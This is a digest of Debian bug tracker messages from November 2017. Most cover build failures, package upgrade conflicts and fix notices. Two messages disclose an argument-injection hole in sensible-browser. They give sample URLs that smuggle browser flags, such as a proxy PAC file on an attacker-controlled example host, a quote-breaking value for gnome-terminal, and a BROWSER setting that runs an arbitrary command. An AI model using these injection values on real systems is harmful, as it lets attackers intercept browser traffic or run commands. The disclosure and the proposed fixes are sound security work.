Bug#881898: mariadb-10.1: Uploads rejected by dak, blocking testing migration of mariadb-10.1 and its reverse dependencies
Source: mariadb-10.1 Version: 10.1.28-2 Severity: serious Justification: makes the package in question unusable or mostly so Dear Maintainer, The recent upload of mariadb-10.1 remains in Uploaded status on various architectures because as Mattia Rizzolo reported "the binary uploads got rejected by dak because they tried to upload binaries with a lower version than ones already installed (and built by mariadb-10.2)." Please fix these issues so mariadb-10.1 can finally migrate to testing and unblock the testing migration of its many reverse dependencies. Maintainers of reverse dependencies will be forced to remove the MySQL/MariaDB support in their packages if they want their packages to migrate to testing otherwise. This is not in the interest of our users. Kind Regards, Bas
Bug#876988: marked as done (python-structlog FTBFS with twisted 17.9.0)
Your message dated Thu, 16 Nov 2017 06:34:15 + with message-idand subject line Bug#876988: fixed in python-structlog 17.2.0-1 has caused the Debian Bug report #876988, regarding python-structlog FTBFS with twisted 17.9.0 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 876988: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=876988 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: python-structlog Version: 16.1.0-1 Severity: serious Tags: buster sid https://tests.reproducible-builds.org/debian/rb-pkg/unstable/amd64/python-structlog.html ... === short test summary info FAIL tests/test_twisted.py::TestExtractStuffAndWhy::()::test_handlesFailures SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:91: Requires colorama. SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:78: Requires colorama. SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:121: Requires colorama. SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:150: Requires colorama. SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_processors.py:253: Python 3-only SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:104: Requires colorama. SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_stdlib.py:86: Python 3-only SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:136: Requires colorama. SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:59: Requires colorama. SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_stdlib.py:92: Python 3-only SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_processors.py:459: Python 3-only SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_threadlocal.py:182: Needs greenlet. SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_processors.py:409: Python 3-only SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_processors.py:177: rapidjson is missing. SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:67: Requires colorama. SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_processors.py:269: Python 3-only SKIP [1] .pybuild/pythonX.Y_2.7/build/tests/test_dev.py:162: Requires colorama. === FAILURES === _ TestExtractStuffAndWhy.test_handlesFailures __ self = def test_handlesFailures(self): """ Extracts failures and events. """ f = Failure(ValueError()) > assert ( (f, "foo", {}) == _extractStuffAndWhy({"_why": "foo", "_stuff": f}) ) E AssertionError: assert (, 'foo', {}) == (, 'foo', {}) E At index 0 diff: != E Use -v to get the full diff tests/test_twisted.py:106: AssertionError === warnings summary === None [pytest] section in setup.cfg files is deprecated, use [tool:pytest] instead. -- Docs: http://doc.pytest.org/en/latest/warnings.html = 1 failed, 200 passed, 17 skipped, 1 warnings in 2.09 seconds = E: pybuild pybuild:283: test: plugin distutils failed with: exit code=1: cd /build/1st/python-structlog-16.1.0/.pybuild/pythonX.Y_2.7/build; python2.7 -m pytest tests dh_auto_test: pybuild --test --test-pytest -i python{version} -p 2.7 returned exit code 13 debian/rules:7: recipe for target 'build' failed make: *** [build] Error 25 --- End Message --- --- Begin Message --- Source: python-structlog Source-Version: 17.2.0-1 We believe that the bug you reported is fixed in the latest version of python-structlog, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 876...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Vincent Bernat (supplier of updated python-structlog package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Thu, 16 Nov 2017 07:08:10 +0100 Source: python-structlog Binary: python-structlog python3-structlog python-structlog-doc Architecture: source all Version: 17.2.0-1 Distribution: unstable Urgency: medium Maintainer: Debian Python Modules Team
Bug#881869: FTBFS: recipe for target 'test-/5x5PF.diff' failed
Dear Aaron M. Ucko, thanks for your report. I have already filled an issue about it: https://github.com/Normaliz/Normaliz/issues/161 I hope it will be fixed quickly. Cheers, Jerome -- Jerome BENOIT | calculus+at-rezozer^dot*net https://qa.debian.org/developer.php?login=calcu...@rezozer.net AE28 AE15 710D FF1D 87E5 A762 3F92 19A6 7F36 C68B signature.asc Description: OpenPGP digital signature
Bug#881885: tuxpaint: FTBFS with high degree of parallelism
Source: tuxpaint Version: 1:0.9.22-7 Severity: serious Justification: fails to build from source (but built successfully in the past) Hi, tuxpaint FTBFS during a highly parallel build. With -j16 it always failed, with -j8 it failed sometimes. Probably anything using 2 or more threads could fail. msgfmt -o trans/wa.mo src/po/wa.po ...Preparing translation files... msgfmt -o trans/el.mo src/po/el.po msgfmt: error while opening "trans/el.mo" for writing: No such file or directory Makefile:414: recipe for target 'trans/el.mo' failed make[1]: *** [trans/el.mo] Error 1 Looks like a race condition between creating a directory and putting a file into it. Andreas
Bug#881883: libnormaliz-dev-common: fails to upgrade from 'testing' - trying to overwrite /usr/include/libnormaliz/HilbertSeries.h
Package: libnormaliz-dev-common Version: 3.4.1+ds-1 Severity: serious User: debian...@lists.debian.org Usertags: piuparts Hi, during a test with piuparts I noticed your package fails to upgrade from 'testing'. It installed fine in 'testing', then the upgrade to 'sid' fails because it tries to overwrite other packages files without declaring a Breaks+Replaces relation. See policy 7.6 at https://www.debian.org/doc/debian-policy/ch-relationships.html#s-replaces >From the attached log (scroll to the bottom...): Selecting previously unselected package libnormaliz-dev-common. Preparing to unpack .../libnormaliz-dev-common_3.4.1+ds-1_all.deb ... Unpacking libnormaliz-dev-common (3.4.1+ds-1) ... dpkg: error processing archive /var/cache/apt/archives/libnormaliz-dev-common_3.4.1+ds-1_all.deb (--unpack): trying to overwrite '/usr/include/libnormaliz/HilbertSeries.h', which is also in package libnormaliz0-dev-common 3.1.1+ds-1 Errors were encountered while processing: /var/cache/apt/archives/libnormaliz-dev-common_3.4.1+ds-1_all.deb cheers, Andreas libnormaliz0-dev-common=3.1.1+ds-1_libnormaliz-dev-common=3.4.1+ds-1.log.gz Description: application/gzip
Bug#881881: libtrilinos-kokkos-kernels-dev: fails to upgrade from 'testing' - trying to overwrite /usr/include/trilinos/Kokkos_ArithTraits.hpp
Package: libtrilinos-kokkos-kernels-dev Version: 12.12.1-1 Severity: serious User: debian...@lists.debian.org Usertags: piuparts Hi, during a test with piuparts I noticed your package fails to upgrade from 'testing'. It installed fine in 'testing', then the upgrade to 'sid' fails because it tries to overwrite other packages files without declaring a Breaks+Replaces relation. See policy 7.6 at https://www.debian.org/doc/debian-policy/ch-relationships.html#s-replaces >From the attached log (scroll to the bottom...): Selecting previously unselected package libtrilinos-kokkos-kernels-dev:amd64. Preparing to unpack .../libtrilinos-kokkos-kernels-dev_12.12.1-1_amd64.deb ... Unpacking libtrilinos-kokkos-kernels-dev:amd64 (12.12.1-1) ... dpkg: error processing archive /var/cache/apt/archives/libtrilinos-kokkos-kernels-dev_12.12.1-1_amd64.deb (--unpack): trying to overwrite '/usr/include/trilinos/Kokkos_ArithTraits.hpp', which is also in package libtrilinos-tpetra-dev 12.10.1-4+b1 dpkg-deb: error: paste subprocess was killed by signal (Broken pipe) Errors were encountered while processing: /var/cache/apt/archives/libtrilinos-kokkos-kernels-dev_12.12.1-1_amd64.deb cheers, Andreas libtrilinos-tpetra-dev=12.10.1-4+b1_libtrilinos-kokkos-kernels-dev=12.12.1-1.log.gz Description: application/gzip
Bug#881878: fpylll: FTBFS on i386: tests/test_lll.py:40: AssertionError
Source: fpylll Version: 0.3.0+ds-1 Severity: serious Justification: fails to build from source (but built successfully in the past) fpylll/experimental FTBFS on i386: https://buildd.debian.org/status/fetch.php?pkg=fpylll=i386=0.3.0%2Bds-1=1510573507=0 === FAILURES === _ test_lll_lll _ def test_lll_lll(): for m, n in dimensions: A = make_integer_matrix(m, n) for int_type in int_types: AA = IntegerMatrix.from_matrix(A, int_type=int_type) b00 = [] for float_type in float_types: B = copy(AA) M = GSO.Mat(B, float_type=float_type) lll = LLL.Reduction(M) lll() if (m, n) == (0, 0): continue b00.append(B[0, 0]) for i in range(1, len(b00)): > assert b00[0] == b00[i] E assert 0 == -1 tests/test_lll.py:40: AssertionError = 1 failed, 23 passed in 88.09 seconds = E: pybuild pybuild:283: test: plugin distutils failed with: exit code=1: cd /<>/fpylll-0.3.0+ds/.pybuild/pythonX.Y_2.7/build; python2.7 -m pytest tests dh_auto_test: pybuild --test --test-pytest -i python{version} -p 2.7 returned exit code 13 debian/rules:11: recipe for target 'build-arch' failed make: *** [build-arch] Error 25 Andreas
Bug#881877: libzip: FTBFS on several arches: encryption-nonrandom-aes* tests fail
Source: libzip Version: 1.3.0+dfsg.1-1 Severity: serious Justification: fails to build from source (but built successfully in the past) Hi, libzip/experimental FTBFS on several architectures: https://buildd.debian.org/status/package.php?p=libzip=experimental e.g. i386: == libzip 1.3.0: regress/test-suite.log == # TOTAL: 119 # PASS: 113 # SKIP: 3 # XFAIL: 0 # FAIL: 3 # XPASS: 0 # ERROR: 0 .. contents:: :depth: 2 FAIL: encryption-nonrandom-aes128 = Binary files ../encrypt-aes128-noentropy.zip and encrypt.zzip differ encryption-nonrandom-aes128 -- FAIL: files FAIL encryption-nonrandom-aes128.test (exit status: 1) FAIL: encryption-nonrandom-aes192 = Binary files ../encrypt-aes192-noentropy.zip and encrypt.zzip differ encryption-nonrandom-aes192 -- FAIL: files FAIL encryption-nonrandom-aes192.test (exit status: 1) FAIL: encryption-nonrandom-aes256 = Binary files ../encrypt-aes256-noentropy.zip and encrypt.zzip differ encryption-nonrandom-aes256 -- FAIL: files FAIL encryption-nonrandom-aes256.test (exit status: 1) Andreas
Bug#881627: marked as done (ruby-http-parser.rb: FTBFS with newer http-parser version)
Your message dated Thu, 16 Nov 2017 00:55:42 + with message-idand subject line Bug#881627: fixed in ruby-http-parser.rb 0.6.0-4 has caused the Debian Bug report #881627, regarding ruby-http-parser.rb: FTBFS with newer http-parser version to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 881627: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881627 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: ruby-http-parser.rb Version: 0.6.0-3+b3 Severity: serious Tags: upstream Dear Maintainer, your package build-depends on http-parser, and a new version of that one has been around for a while. Even before eventually uploading last night I already saw a problem in the test suite of your package. However, due to a fault on my side, the new http-parser went to unstable instead of experimental. So this increases the pressure for your package, sorry about that. With http-parser 2.7.1, one test fails: 1) HTTP::Parser should parse request: line folding in header value Failure/Error: expect(@headers).to eq(test['headers']) expected: {"Line1"=>"abcdefghijklmno qrs", "Line2"=>"line2\t"} got: {"Line1"=>"abc\tdef ghi\t\tjkl mno \t \tqrs", "Line2"=>"line2\t"} (compared using ==) Diff: @@ -1,3 +1,3 @@ -"Line1" => "abcdefghijklmno qrs", +"Line1" => "abc\tdef ghi\t\tjkl mno \t \tqrs", "Line2" => "line2\t", # ./spec/parser_spec.rb:347:in `block (4 levels) in ' If I understand correctly, this is taken from spec/support/requests.json line 445 and 457f. While doubtlessly http-parser changed the behaviour, I'm not sure yet whether this wasn't rather about fixing bugs - bugs the test in ruby-http-parser.rb relied upon. However, HTTP header line folding is complicated and actually also deprecated in RFC 7230. Reading that one and also the older description in RFC 2616 I guess there a too many freedoms to expect a certain result. Also it seems http-parser 2.7.1 does unfolding in a ... surprising manner. Now, quite frankly, my main interest is a sound solution. Otherwise, I'm not keen on legal discussions, especially when it's about a deprecated feature like this one. It's my job to sort these things out with http-parser upstream but since I'm not sure how long this will take: Would you mind disabling or relaxing the test on your side for the time being? You might as well upgrade the test to the one in http-parser/test.c¹ which is where obviously it was taken from in the first place - but I'd expect this to change again soon. Sorry for the mess, and kind regards, Christoph ¹ https://github.com/nodejs/http-parser/blob/master/test.c (line 614) signature.asc Description: Digital signature --- End Message --- --- Begin Message --- Source: ruby-http-parser.rb Source-Version: 0.6.0-4 We believe that the bug you reported is fixed in the latest version of ruby-http-parser.rb, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 881...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Cédric Boutillier (supplier of updated ruby-http-parser.rb package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Wed, 15 Nov 2017 23:15:54 +0100 Source: ruby-http-parser.rb Binary: ruby-http-parser.rb ruby-http-parser.rb-doc Architecture: source Version: 0.6.0-4 Distribution: unstable Urgency: medium Maintainer: Debian Ruby Extras Maintainers Changed-By: Cédric Boutillier Description: ruby-http-parser.rb - Simple callback-based HTTP request/response parser ruby-http-parser.rb-doc - Simple callback-based HTTP request/response parser (documentation Closes: 881627 Changes: ruby-http-parser.rb (0.6.0-4) unstable; urgency=medium . * Team upload * Remove version in the gem2deb build-dependency * Use https:// in Vcs-* fields * Run wrap-and-sort on packaging files * Bump Standards-Version to 4.1.1 (no changes needed) * Bump debhelper compatibility level to 10 * Add Testsuite field for autopkgtest * Add
Bug#881876: astromenace: FTBFS on 32-bit arches: dh_install: astromenace missing files: astromenace_64.png
Source: astromenace Version: 1.3.2+repack-4 Severity: serious Justification: fails to build from source (but built successfully in the past) Hi, astromenace FTBFS on 32-bit architectures (tried i386 and armhf) while it builds fine on amd64. debian/rules override_dh_install make[1]: Entering directory '/build/astromenace-1.3.2+repack' dh_install --exclude=astromenace_64.png dh_install: astromenace missing files: astromenace_64.png dh_install: missing files, aborting debian/rules:28: recipe for target 'override_dh_install' failed make[1]: *** [override_dh_install] Error 25 This could be caused by a change in debhelper. Andreas astromenace_1.3.2+repack-4.log.gz Description: application/gzip
Processed: reopening 718272
Processing commands for cont...@bugs.debian.org: > reopen 718272 Bug #718272 {Done: Jonas Smedegaard} [src:bitcoin] upstream does not support stable releases (block migration to testing) Bug reopened Ignoring request to alter fixed versions of bug #718272 to the same values previously set > thanks Stopping processing here. Please contact me if you need assistance. -- 718272: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=718272 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#881627: marked as pending
tag 881627 pending thanks Hello, Bug #881627 reported by you has been fixed in the Git repository. You can see the changelog below, and you can check the diff of the fix at: https://anonscm.debian.org/cgit/pkg-ruby-extras/ruby-http-parser.rb.git/commit/?id=fa0a473 --- commit fa0a473327b3281570887a81a304c6ed8ac52dc0 Author: Cédric BoutillierDate: Wed Nov 15 23:16:15 2017 +0100 prepare changelog diff --git a/debian/changelog b/debian/changelog index 281ca03..a51e283 100644 --- a/debian/changelog +++ b/debian/changelog @@ -1,3 +1,17 @@ +ruby-http-parser.rb (0.6.0-4) unstable; urgency=medium + + * Team upload + * Remove version in the gem2deb build-dependency + * Use https:// in Vcs-* fields + * Run wrap-and-sort on packaging files + * Bump Standards-Version to 4.1.1 (no changes needed) + * Bump debhelper compatibility level to 10 + * Add Testsuite field for autopkgtest + * Add 0006-disable-folding-header-test.patch to support newer http-parser +(Closes: #881627). Thanks Christoph Biedl for the patch! + + -- Cédric Boutillier Wed, 15 Nov 2017 23:15:54 +0100 + ruby-http-parser.rb (0.6.0-3) unstable; urgency=medium [Sebastien Badia]
Processed: Bug#881627 marked as pending
Processing commands for cont...@bugs.debian.org: > tag 881627 pending Bug #881627 [src:ruby-http-parser.rb] ruby-http-parser.rb: FTBFS with newer http-parser version Added tag(s) pending. > thanks Stopping processing here. Please contact me if you need assistance. -- 881627: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881627 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#881864: luksmeta FTBFS: test failures
tags 881864 confirmed help thanks Adrian Bunk wrote... > https://buildd.debian.org/status/package.php?p=luksmeta=sid > FAIL: test-lm-assumptions > FAIL: test-lm-init > FAIL: test-lm-one > FAIL: test-lm-two > FAIL: test-lm-big > FAIL: test-luksmeta Weird. While I always test-build on at least two different architectures on plain Debian schroots before uploading, appearently there is something different on the release architecture buildds. Failing is test.c around line 151: | r = crypt_format(cd, CRYPT_LUKS1, "aes", "xts-plain64", | NULL, NULL, 32, NULL); | if (r < 0) | error(EXIT_FAILURE, -r, "%s:%d", __FILE__, __LINE__); which fails with "test.c:151: Input/output error" According to strace (seen on amdahl 4.9.0-4-arm64): | socket(AF_ALG, SOCK_SEQPACKET, 0) = -1 EAFNOSUPPORT (Address family not supported by protocol) while I get | socket(AF_ALG, SOCK_SEQPACKET, 0) = 5 on my private boxes. Also confusing, this is in libcryptsetup. For the moment, I can only wild-guess about what's happening here. Christoph signature.asc Description: Digital signature
Processed: Re: Bug#881864: luksmeta FTBFS: test failures
Processing commands for cont...@bugs.debian.org: > tags 881864 confirmed help Bug #881864 [src:luksmeta] luksmeta FTBFS: test failures Added tag(s) help and confirmed. > thanks Stopping processing here. Please contact me if you need assistance. -- 881864: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881864 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#881869: FTBFS: recipe for target 'test-/5x5PF.diff' failed
Source: normaliz Version: 3.4.1+ds-1 Severity: serious Tags: upstream Justification: fails to build from source (but built successfully in the past) User: debian-powe...@lists.debian.org Usertags: powerpc ppc64 ppc64el Builds of normaliz 3.4 for arm64, ppc64el, s390x, and the non-release architectures powerpc and ppc64 (but for some reason not powerpcspe) have been failing: /<>/normaliz-3.4.1+ds/_build/../test/Makefile.classic:52: recipe for target 'test-/5x5PF.diff' failed I don't know what the diff turned out to read (or even whether it's the same on all of these architectures!), but perhaps you can reproduce the problem on a porter box. Could you please take a look? Thanks! -- Aaron M. Ucko, KB1CJC (amu at alum.mit.edu, ucko at debian.org) http://www.mit.edu/~amu/ | http://stuff.mit.edu/cgi/finger/?a...@monk.mit.edu
Bug#881767: closed by Bastien Roucariès <ro...@debian.org> (Bug#881767: fixed in sensible-utils 0.0.11)
Hi, > Source: sensible-utils > Source-Version: 0.0.11 > > We believe that the bug you reported is fixed in the latest version of > sensible-utils, which is due to be installed in the Debian FTP archive. I can't find the source of the new version yet so I can't review it yet. I think we need to exclude URI starting with `-` or `--` as well. Otherwise an attacker might pass flags (such as --proxy-pac-url=http://evil.example.com/proxy.pac) with: BROWSER=chromium sensible-browser proxy-pac-url=http://evil.example.com/proxy.pac Seometing like: if ! echo -n "$URL" | head -n1 | grep '^[a-zA-Z][a-zA-Z0-9+\-.]*:' > /dev/null ; then exit 1 fi or: if ! echo -n "$URL" | grep -z '^[a-zA-Z][a-zA-Z0-9+\-.]*:' > /dev/null ; then exit 1 fi or: case "$1" in -*) exit 1 ;; *) true ;; esac By the way, this line is vulenable as well: exec /usr/bin/gnome-terminal -e "/usr/bin/www-browser ${URL:+\"$URL\"}" For example: URL='http://www.example.com/; "--incognito' ; /usr/bin/gnome-terminal -e "chromium ${URL:+\"$URL\"}" A possible fix is to use: exec /usr/bin/gnome-terminal -- "/usr/bin/www-browser" ${URL:+"$URL"} Cheers, -- Gabriel
Bug#881816: marked as done (openstack-dashboard: fails to install non-interactively: postinst debconfage fails)
Your message dated Wed, 15 Nov 2017 22:20:54 + with message-idand subject line Bug#881816: fixed in horizon 3:12.0.0-4 has caused the Debian Bug report #881816, regarding openstack-dashboard: fails to install non-interactively: postinst debconfage fails to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 881816: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881816 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: openstack-dashboard Version: 3:12.0.0-3 Severity: serious Justification: fails to install, makes rbdeps FTBFS Hi! When installing openstack-dashboard non-interactively, it fails with: Setting up openstack-dashboard (3:12.0.0-3) ... dpkg: error processing package openstack-dashboard (--configure): installed openstack-dashboard package post-installation script subprocess returned error exit status 30 Interactively, it asks questions then succeeds. But as it's a build-dependency of several packages (ironic-ui, manila-ui, etc), it must be installable inside sbuild. Meow! -- System Information: Debian Release: buster/sid APT prefers unstable-debug APT policy: (500, 'unstable-debug'), (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: armhf (armv7l) Kernel: Linux 4.14.0-00115-g3d7c587c4c1b (SMP w/4 CPU cores; PREEMPT) Locale: LANG=C.UTF-8, LC_CTYPE=C.UTF-8 (charmap=UTF-8), LANGUAGE=C.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: sysvinit (via /sbin/init) Versions of packages openstack-dashboard depends on: ii adduser3.116 ii debconf [debconf-2.0] 1.5.65 pn libjs-jquery pn libjs-jquery-cookie pn python pn python-django-horizon openstack-dashboard recommends no packages. Versions of packages openstack-dashboard suggests: pn memcached pn openstack-dashboard-apache --- End Message --- --- Begin Message --- Source: horizon Source-Version: 3:12.0.0-4 We believe that the bug you reported is fixed in the latest version of horizon, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 881...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Thomas Goirand (supplier of updated horizon package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Wed, 15 Nov 2017 21:53:27 + Source: horizon Binary: horizon-doc openstack-dashboard openstack-dashboard-apache python-django-horizon Architecture: source all Version: 3:12.0.0-4 Distribution: unstable Urgency: medium Maintainer: Debian OpenStack Changed-By: Thomas Goirand Description: horizon-doc - web application to control an OpenStack cloud - doc openstack-dashboard - web application to control an OpenStack cloud openstack-dashboard-apache - web application to control an OpenStack cloud - Apache support python-django-horizon - Django module providing web interaction with OpenStack Closes: 881816 Changes: horizon (3:12.0.0-4) unstable; urgency=medium . * Fixed debian/openstack-dashboard.templates. Huge thanks to Justin for his perfect work on the English templates. * Fixed installing in non-interactive mode (Closes: #881816). Checksums-Sha1: e92ee54da83c53d64d7c9e59087816a6a4ce3fa1 4781 horizon_12.0.0-4.dsc d12eb5a5f6f0828004a3d11d31b92e1b0dd57297 26524 horizon_12.0.0-4.debian.tar.xz b0971e6584564b6433b605cf956318fee1a70ea0 1869876 horizon-doc_12.0.0-4_all.deb de0a03111ce6b0cc85cccd62e57c9e56dc528a74 17886 horizon_12.0.0-4_amd64.buildinfo 132736637987ff94c9cd984f80532802eb2c9de5 14088 openstack-dashboard-apache_12.0.0-4_all.deb e1da1cc85d15728ed7180ff8dfbbf0f526506e7b 2233536 openstack-dashboard_12.0.0-4_all.deb 3892ec5ed663eb6dbb80132bb8cc099bfb249844 1995076 python-django-horizon_12.0.0-4_all.deb Checksums-Sha256: d299f8c4c1d0c0b1b77e88680e33052066302e4e6347787fc503a1c7a6d644a8 4781 horizon_12.0.0-4.dsc 4395fb042ac9003d6ec473a8271a5812106da45f000798536dfd320b72c3e266 26524 horizon_12.0.0-4.debian.tar.xz af73252d716080b860f93319536c4092c2c721084bd76ba75a599111b9d8a629 1869876
Processed: Bug#881816 marked as pending
Processing commands for cont...@bugs.debian.org: > tag 881816 pending Bug #881816 [openstack-dashboard] openstack-dashboard: fails to install non-interactively: postinst debconfage fails Added tag(s) pending. > thanks Stopping processing here. Please contact me if you need assistance. -- 881816: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881816 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#881816: marked as pending
tag 881816 pending thanks Hello, Bug #881816 reported by you has been fixed in the Git repository. You can see the changelog below, and you can check the diff of the fix at: https://anonscm.debian.org/cgit/openstack/services/horizon.git/commit/?id=6a61143 --- commit 6a6114391c11cb22ec28ca0273ebc719a756a954 Author: Thomas GoirandDate: Wed Nov 15 21:54:06 2017 + Fixed installing in non-interactive mode (Closes: #881816). diff --git a/debian/changelog b/debian/changelog index de97850..8a04cc5 100644 --- a/debian/changelog +++ b/debian/changelog @@ -1,9 +1,10 @@ -horizon (3:12.0.0-4) UNRELEASED; urgency=medium +horizon (3:12.0.0-4) unstable; urgency=medium * Fixed debian/openstack-dashboard.templates. Huge thanks to Justin for his perfect work on the English templates. + * Fixed installing in non-interactive mode (Closes: #881816). - -- Thomas Goirand Wed, 15 Nov 2017 00:03:34 +0100 + -- Thomas Goirand Wed, 15 Nov 2017 21:53:27 + horizon (3:12.0.0-3) unstable; urgency=medium
Bug#881864: luksmeta FTBFS: test failures
Source: luksmeta Version: 8-2 Severity: serious https://buildd.debian.org/status/package.php?p=luksmeta=sid ... /usr/bin/make check-TESTS make[3]: Entering directory '/<>' make[4]: Entering directory '/<>' PASS: test-crc32c FAIL: test-lm-assumptions FAIL: test-lm-init FAIL: test-lm-one FAIL: test-lm-two FAIL: test-lm-big FAIL: test-luksmeta Testsuite summary for luksmeta 8 # TOTAL: 7 # PASS: 1 # SKIP: 0 # XFAIL: 0 # FAIL: 6 # XPASS: 0 # ERROR: 0 See ./test-suite.log Makefile:995: recipe for target 'test-suite.log' failed make[4]: *** [test-suite.log] Error 1
Bug#881767: marked as done (sensible-utils: Argument injection in sensible-browser)
Your message dated Wed, 15 Nov 2017 21:10:37 + with message-idand subject line Bug#881767: fixed in sensible-utils 0.0.11 has caused the Debian Bug report #881767, regarding sensible-utils: Argument injection in sensible-browser to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 881767: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=881767 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: sensible-utils Version: 0.0.10 Severity: grave Tags: security Justification: user security hole When the BROWSER environment variable is set, an invalid URI can be used to inject arguments in sensible-browser. Description === When BROWSER is set, sensible-browser calls the actual browser with: ~~~sh cmd=$(printf "$i\n" "$URL") $cmd && exit 0 ~~~ If a IFS character is in $URL, this leads to the injection of extra arguments when calling the actual browser. For example, this commands triggers the incognito mode of Chromium: ~~~sh BROWSER=chromium sensible-browser "http://www.example.com/ --incognito ~~~ This URI is invalid but if the caller does not properly validate the URI, an attacker could add extra arguments when calling the browser. For example, Emacs might call sensible-browser with an invalid URI. With this configuration: ~~~elisp (setq browse-url-browser-function (quote browse-url-generic)) (setq browse-url-generic-program "sensible-browser") ~~~ an org-mode file like this one: ~~~org [[http://www.yahoo.fr --incognito][test]] ~~~ will trigger the incognito mode of Chromium (this does not happen with org-mode 8.2.10 shipped in the emacs25 package but it does happen using org-mode 9.1.2 shipped in the elpa-org package). While this particular example is not very dangerous other arguments can be more harmful. For example, it is possible to inject an argument which overrides the proxy configuration (with a PAC file). This org-mode link launches Chromium with an alternative PAC file (silently): ~~~org [[http://www.example.com/ --proxy-pac-file=http://dangerous.example.com/proxy.pac][test]] ~~~ An attacker could use this type of URI, to forward all the traffic coming from the browser to a server he's controlling. Possibles fixes === * A simple fix, would be for sensible-browser to actually check that the URI parameter does not contain any IFS character (which are not valid in URI or IRI and fail if it does). It should probably add extra verification (such as checking that the argument does not begin by a dash). * Another solution would be to escape IFS characters. * The simpler fix would probably to drop support for "%s" in the BROWSER string: this feature is not supported by other programs anyway. This is "Alternative Secure BROWSER Definition" in [1]. * Or we could implement "Compatible Secure BROWSER Definition" from [1] but it may not be very convenient to do in shell. Moreover, we should probably add some basic URI validation in order to reject things like: ~~~sh BROWSER=chromium sensible-browser "--incognito" ~~~ Additional problems === sensible-browser does not handle empty browser in the BROWSER environment variable: ~~~sh BROWSER=":chromium" sensible-browser "xterm" ~~~ This command runs xterm (we could have used "rm -rf /"). Similar vulnerabilities in other packages = * lilypond lilypond-invoke-editor is vulnerable to the same argument injection [2]: ~~~sh BROWSER="chromium" lilypond-invoke-editor "http://www.example.com/ --incognito" ~~~ Lilypond suggests using it as URI handler [3]: > When this functionality is active, LilyPond adds hyperlinks to the > PDF file. These hyperlinks are sent to a ‘URI helper’ > or a web-browser, which opens a text-editor with the cursor in > the right place. > > To make this chain work, you should configure your PDF viewer > to follow hyperlinks using the ‘lilypond-invoke-editor’ > script supplied with LilyPond. > > The program ‘lilypond-invoke-editor’ is a small helper program. > It will invoke an editor for the special textedit URIs, and run > a web browser for others. [...] * 